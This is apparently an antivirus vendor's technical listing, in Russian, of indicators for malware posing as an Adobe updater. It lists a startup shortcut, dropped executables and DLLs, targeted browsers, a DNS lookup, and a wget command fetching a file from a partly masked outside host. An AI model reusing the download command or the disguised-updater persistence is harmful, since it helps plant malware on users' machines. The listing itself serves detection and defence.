Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\adobe-updater.lnk
- '%PROGRAM_FILES%\Adobe\wget.exe' -cN --waitretry=3 -t3 -T10 "http://ge###dobe.zz.mu/get_file?si##################################################################################################################################################################################################################"
- '%TEMP%\setup-ads-deleter.exe' /sfx=%TEMP%\setup-ads.exe
- '%TEMP%\deleter.exe' /sfx=<Полный путь к вирусу>
- '%PROGRAM_FILES%\Adobe\adobe-updater.exe'
- '%TEMP%\setup-ads.exe'
- opera.exe
- chrome.exe
- firefox.exe
- %TEMP%\deleter.exe
- %TEMP%\setup-ads.exe
- %TEMP%\setup-ads-deleter.exe
- %TEMP%\nsh5.tmp\KillProc.dll
- %PROGRAM_FILES%\Adobe\adobe-updater.exe
- %TEMP%\nsh2.tmp\System.dll
- %PROGRAM_FILES%\AutoFree Weather\autofree-weather.exe
- %PROGRAM_FILES%\Adobe\wget.exe
- %TEMP%\setup-ads.exe
- %TEMP%\nsh5.tmp\KillProc.dll
- %TEMP%\nsh2.tmp\System.dll
- DNS ASK ge###dobe.zz.mu